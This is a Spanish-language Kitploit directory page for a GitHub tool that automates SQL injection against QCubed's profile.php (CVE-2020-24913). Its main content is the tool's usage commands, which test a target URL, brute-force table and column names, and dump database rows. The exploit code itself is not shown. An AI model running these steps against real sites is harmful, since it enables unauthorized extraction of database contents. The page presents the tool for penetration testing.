Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-24913-exploit — inyección SQL automatizada para el archivo profile.php de QCubed | Kitploit
Herramientas/GitHubGitHub/shpaw415/cve-2020-24913-exploit
Análisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de Penetración
GitHubshpaw415/cve-2020-24913-exploit

CVE-2020-24913-exploit

inyección SQL automatizada para el archivo profile.php de QCubed

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

qcubed-exploit

Necesitas tener Bun instalado: https://bun.sh

Para instalar las dependencias:

root@kitploit:~
bun install

Para ejecutar:

root@kitploit:~
# mostrar ayuda
bun run exploit -h

# probar si es vulnerable
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php

# crear una sesión para un nuevo objetivo
bun run exploit create -n tu_nombre_de_sesion -u https://site.com/framework/assets/_core/php/profile.php

# fuerza bruta de tablas
bun run exploit brute-table -n tu_nombre_de_sesion -w ruta/al/wordlist.txt

# mostrar tablas encontradas o columnas de una tabla
bun run exploit show-table -n tu_nombre_de_sesion
bun run exploit show-column -n tu_nombre_de_sesion -t nombre_de_tabla

# fuerza bruta de id
bun run exploit brute-id -n tu_nombre_de_sesion -t nombre_de_tabla -i 1

# fuerza bruta de valor de fila
# opcionalmente añade -r para reanudar la fuerza bruta desde donde se detuvo
bun run exploit brute-column -n tu_nombre_de_sesion -t nombre_de_tabla -c nombre_de_columna -i 1

# mostrar pares clave-valor encontrados de una tabla
# opcionalmente `-i id_value` para mostrar solo un id particular
bun run exploit show-rows -n tu_nombre_de_sesion -t nombre_de_tabla

Descargar herramienta